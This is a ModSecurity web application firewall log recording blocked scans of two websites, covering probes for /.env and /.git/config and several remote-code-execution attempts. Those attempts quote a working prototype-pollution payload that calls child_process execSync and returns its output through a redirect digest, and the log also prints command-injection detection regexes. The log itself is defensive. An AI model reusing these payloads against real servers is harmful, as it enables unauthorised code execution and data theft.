[Thu Jan 01 21:41:16.177219 2026] [:error] [pid 1122285] [client 45.82.13.170:54068] [client 45.82.13.170] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVbb7F3H7dX9yBPXgd6V3QAAAAg"]
[Thu Jan 01 21:41:16.177508 2026] [:error] [pid 1122285] [client 45.82.13.170:54068] [client 45.82.13.170] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVbb7F3H7dX9yBPXgd6V3QAAAAg"]
[Thu Jan 01 21:41:16.177658 2026] [:error] [pid 1122285] [client 45.82.13.170:54068] [client 45.82.13.170] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVbb7F3H7dX9yBPXgd6V3QAAAAg"]
[Fri Jan 02 00:02:34.981850 2026] [:error] [pid 1135268] [client 44.220.131.241:50286] [client 44.220.131.241] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aVb9CvxzwISJoUXnjYWeGgAAAAM"]
[Fri Jan 02 00:02:34.982405 2026] [:error] [pid 1135268] [client 44.220.131.241:50286] [client 44.220.131.241] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aVb9CvxzwISJoUXnjYWeGgAAAAM"]
[Fri Jan 02 00:02:34.983375 2026] [:error] [pid 1135268] [client 44.220.131.241:50286] [client 44.220.131.241] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aVb9CvxzwISJoUXnjYWeGgAAAAM"]
[Fri Jan 02 00:02:34.983563 2026] [:error] [pid 1135268] [client 44.220.131.241:50286] [client 44.220.131.241] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aVb9CvxzwISJoUXnjYWeGgAAAAM"]
[Fri Jan 02 02:23:44.256866 2026] [:error] [pid 1136062] [client 54.236.84.252:55332] [client 54.236.84.252] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aVceIN1XN7zjd17Dt_IN1gAAAAg"]
[Fri Jan 02 02:23:44.257163 2026] [:error] [pid 1136062] [client 54.236.84.252:55332] [client 54.236.84.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aVceIN1XN7zjd17Dt_IN1gAAAAg"]
[Fri Jan 02 02:23:44.257310 2026] [:error] [pid 1136062] [client 54.236.84.252:55332] [client 54.236.84.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aVceIN1XN7zjd17Dt_IN1gAAAAg"]
[Fri Jan 02 05:41:55.052480 2026] [:error] [pid 1139158] [client 45.82.13.170:57236] [client 45.82.13.170] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aVdMkxcfRGwFZiETM9WdJwAAAAY"]
[Fri Jan 02 05:41:55.052764 2026] [:error] [pid 1139158] [client 45.82.13.170:57236] [client 45.82.13.170] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aVdMkxcfRGwFZiETM9WdJwAAAAY"]
[Fri Jan 02 05:41:55.052965 2026] [:error] [pid 1139158] [client 45.82.13.170:57236] [client 45.82.13.170] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aVdMkxcfRGwFZiETM9WdJwAAAAY"]
[Fri Jan 02 12:36:27.305689 2026] [:error] [pid 1142248] [client 85.11.167.4:33992] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1767353787_7895',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVetuyFWcSParxthkoUV_gAAAAg"], referer: https://economiasolidale.38121.it
[Fri Jan 02 12:36:27.305851 2026] [:error] [pid 1142248] [client 85.11.167.4:33992] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1767353787_7895',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [ [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVetuyFWcSParxthkoUV_gAAAAg"], referer: https://economiasolidale.38121.it
[Fri Jan 02 12:36:27.305936 2026] [:error] [pid 1142248] [client 85.11.167.4:33992] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo vuln_1767353787_7895 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVetuyFWcSParxthkoUV_gAAAAg"], referer: https://economiasolidale.38121.it
[Fri Jan 02 12:36:27.307072 2026] [:error] [pid 1142248] [client 85.11.167.4:33992] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVetuyFWcSParxthkoUV_gAAAAg"], referer: https://economiasolidale.38121.it
[Fri Jan 02 12:36:27.307256 2026] [:error] [pid 1142248] [client 85.11.167.4:33992] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVetuyFWcSParxthkoUV_gAAAAg"], referer: https://economiasolidale.38121.it
[Fri Jan 02 12:36:27.469178 2026] [:error] [pid 1142291] [client 85.11.167.4:34002] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1767353787',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "app [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVetu1MKrsfxKnoUrDqJVgAAABE"], referer: https://economiasolidale.38121.it
[Fri Jan 02 12:36:27.469293 2026] [:error] [pid 1142291] [client 85.11.167.4:34002] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1767353787',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag " [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVetu1MKrsfxKnoUrDqJVgAAABE"], referer: https://economiasolidale.38121.it
[Fri Jan 02 12:36:27.469381 2026] [:error] [pid 1142291] [client 85.11.167.4:34002] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo test_1767353787 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVetu1MKrsfxKnoUrDqJVgAAABE"], referer: https://economiasolidale.38121.it
[Fri Jan 02 12:36:27.470408 2026] [:error] [pid 1142291] [client 85.11.167.4:34002] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVetu1MKrsfxKnoUrDqJVgAAABE"], referer: https://economiasolidale.38121.it
[Fri Jan 02 12:36:27.470566 2026] [:error] [pid 1142291] [client 85.11.167.4:34002] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVetu1MKrsfxKnoUrDqJVgAAABE"], referer: https://economiasolidale.38121.it
[Fri Jan 02 15:13:17.073556 2026] [:error] [pid 1142259] [client 46.34.163.65:15128] [client 46.34.163.65] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2. [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVfSfTRVOXEaCAlm797DiQAAAAs"]
[Fri Jan 02 15:13:17.073702 2026] [:error] [pid 1142259] [client 46.34.163.65:15128] [client 46.34.163.65] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3 [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVfSfTRVOXEaCAlm797DiQAAAAs"]
[Fri Jan 02 15:13:17.073801 2026] [:error] [pid 1142259] [client 46.34.163.65:15128] [client 46.34.163.65] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${_res}`} ) _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then: $b0} _response: {_prefix: var _r = process.mainmodule.require var _cp = _r(child_ process) var _res = _cp.execsync(echo vuln_check_a1b2c3d4e5f6g7h8i9j0 {timeout: 4000 encoding: utf8}).tostring().trim() throw object.assign(new error(next_redirect) {digest: `${_res}`} ) _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVfSfTRVOXEaCAlm797DiQAAAAs"]
[Fri Jan 02 15:13:17.075187 2026] [:error] [pid 1142259] [client 46.34.163.65:15128] [client 46.34.163.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVfSfTRVOXEaCAlm797DiQAAAAs"]
